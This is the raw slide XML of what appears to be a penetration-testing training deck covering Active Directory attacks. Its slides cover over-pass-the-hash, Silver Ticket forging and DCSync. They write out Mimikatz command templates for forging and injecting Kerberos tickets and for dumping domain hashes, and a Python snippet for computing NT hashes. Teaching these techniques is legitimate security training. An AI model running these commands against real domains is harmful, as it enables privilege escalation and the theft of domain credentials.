          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1295400"/>
            <a:ext cx="6596062" cy="1722081"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PSExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can be used locally</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DC Access initially denied – Over-pass the Hash to get a shell as Domain Admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note: local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> still says non-DA account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96162E32-F32A-41BD-87AA-85B74A19553D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="829"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7339203" y="1175685"/>
            <a:ext cx="4429125" cy="1722081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED333918-3669-4437-A556-257C9F913303}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1606970" y="3159051"/>
            <a:ext cx="9384880" cy="3191619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91827D93-E9E7-4DB4-AB0D-EF7C4038FB27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1606970" y="3922130"/>
            <a:ext cx="220980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8538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92CD6F-6198-4E9F-A48A-C752A2E50308}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>295</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5074208C-ACF6-42FC-8A3C-BC0CE5175CAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Silver Tickets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E819B86-54DB-4CB8-878D-DE9F046AC0E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266700" y="1295400"/>
            <a:ext cx="11510963" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With a service account hash (or password), we can create fake TGSs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The good (bad) thing: Services don’t check the contents, only validity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This means: we can forge ourselves additional privileges in the eyes of the service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need one additional item: Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>IDentifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (SID) for the domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>will get you the account SID, remove the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Relative </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDentifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (RID)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from the end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S-1-5-21-894682392-1650329720-4199156298</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-1104</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> again</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>::golden /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user:user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domain:domain.fqdn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sid:domainSID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target:target.server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service:serviceclass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /rc4:servicehash /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1"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ptt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>will inject the ticket directly into memory, can also export it to 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717704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8A6102-D0BD-40AC-BA8C-3597FE59B1AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>296</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3776DF36-2FF7-49D4-8B56-013FDC446120}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Quick Aside - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NTHashes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D812A4DF-423C-42CD-8EC4-0AED71A15E4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you have a plain-text password, you can easily make an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NTHash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pseudocode: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>md4(utf-16le(password)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>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hashlib,binascii</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hash = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hashlib.new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('md4', 'Password1!'.encode('utf-16le')).digest()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>binascii.hexlify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(hash))</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{882F2F5D-F80F-4CF6-909B-FFF44C359D3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="947019" y="4232542"/>
            <a:ext cx="10297962" cy="1752845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212360420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50DD81-8A16-4298-85EA-701EC6AB345F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="800100" y="1195387"/>
            <a:ext cx="10591800" cy="3819525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{068E2559-3CCD-4510-B53E-DC17B46434BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>297</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5373FCD3-263E-4B1F-9C18-10D31FD24086}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Silver Tickets in Action</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85D6B723-89B6-4E80-B58B-3E9E9A186FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="744624" y="5239904"/>
            <a:ext cx="10702752" cy="8869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571500"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6858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en-US" sz="2000" dirty="0"/>
              <a:t>The service will see this ticket as Administrator in the Domain Admins group!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Note: This does not mean you have DA permissions – only DA permissions for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>that service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4088162-A2EB-4FC9-B840-EBD9FF91E5C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="841548" y="2131430"/>
            <a:ext cx="2873202" cy="383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2674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2A4057-19D3-4BAF-80C3-194DEF953094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>298</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1583FD7D-90C4-4667-A548-153513AAC3EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Beyond OSCP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14834698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B28F49-8E73-4F37-915B-22E80908C901}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>299</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5F9B1DA-7740-4A7C-8F7B-5894E8CC8AE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DCSync</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8885255A-E7A3-4BB2-A184-937FBE1726FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires Domain Replication or Domain Admin privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can obtain the hash of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>any user in the domain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Including that coveted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be done from any machine in the domain if you have the privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Syntax: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lsadump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dcsync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user:name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359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1A5E8-8BE9-4881-BF37-B7ED4BF8EE95}"/>
              </a:ext>
            </a:extLst>
